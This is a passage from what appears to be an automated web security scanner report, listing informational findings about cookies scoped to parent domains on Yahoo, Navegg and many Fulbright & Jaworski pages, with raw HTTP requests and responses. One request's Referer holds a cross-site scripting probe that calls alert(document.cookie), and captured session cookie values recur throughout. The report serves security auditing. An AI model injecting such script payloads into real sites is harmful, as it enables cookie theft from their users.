Etag: "6e2f3ed9101a167ccc2f760d7ec44f1e01b39cc9"
Server: TornadoServer/1.0
Set-Cookie: __ptcx=7uXan4.9hp3Sx.1; expires=Mon, 18 Jul 2011 18:09:09 GMT; Path=/
Set-Cookie: __pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 18 Jul 2011 18:09:09 GMT; Path=/
Content-Length: 30166
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Event log analysis &amp; management</title>

...[SNIP]...

9.13. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:20 GMT
Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 41558


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...

9.14. http://lt.navegg.com/g.lt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lt.navegg.com
Path:   /g.lt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /g.lt?nvst=12596&nvtt=z&nvup=1 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: ltcid=547362597; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2013 11:57:37 GMT
Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2011 15:57:37 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 17:57:37 GMT
Server: lighttpd/1.4.19
Content-Length: 43

tuple=" ";
ltload();
ltsetid("547362597");

9.15. http://www.fulbright.com/Austin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /Austin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Austin HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:53:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1830%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:25 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.16. http://www.fulbright.com/Denver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /Denver

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Denver HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:53:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1974%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:54 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.17. http://www.fulbright.com/London  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /London

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /London HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:54:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2108%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:28 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.18. http://www.fulbright.com/LosAngeles  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /LosAngeles

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LosAngeles HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:54:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A45%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2193%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:45 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.19. http://www.fulbright.com/Minneapolis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /Minneapolis

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Minneapolis HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:54:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2239%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:54 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.20. http://www.fulbright.com/Riyadh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /Riyadh

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Riyadh HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:56:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2679%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:56:29 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.21. http://www.fulbright.com/aboutus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /aboutus

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aboutus HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A57%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D190%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:57 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.22. http://www.fulbright.com/alumni  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /alumni

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D435%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:23 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.23. http://www.fulbright.com/aop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /aop

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aop HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:50:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D934%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:28 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.24. http://www.fulbright.com/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /careers

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Wed, 19 Jan 2011 15:49:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A07%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D268%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:07 GMT;path=/
location: http://www.joinfulbright.com
Content-Type: text/html; charset=UTF-8


           

9.25. http://www.fulbright.com/dc/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /dc/x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dc/x22 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D5%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                <div style="font-family: verdana; text-align: center;">
<img src="http://www.fulbright.com/fjlib/img/logos/fjlogo.jpg"
...[SNIP]...

9.26. http://www.fulbright.com/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /downloads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /downloads HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A58%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D752%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:58 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.27. http://www.fulbright.com/dubai  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /dubai

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dubai HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:54:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2016%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:04 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.28. http://www.fulbright.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.fulbright.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:56 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                <div style="font-family: verdana; text-align: center;">
<img src="http://www.fulbright.com/fjlib/img/logos/fjlogo.jpg"
...[SNIP]...

9.29. http://www.fulbright.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
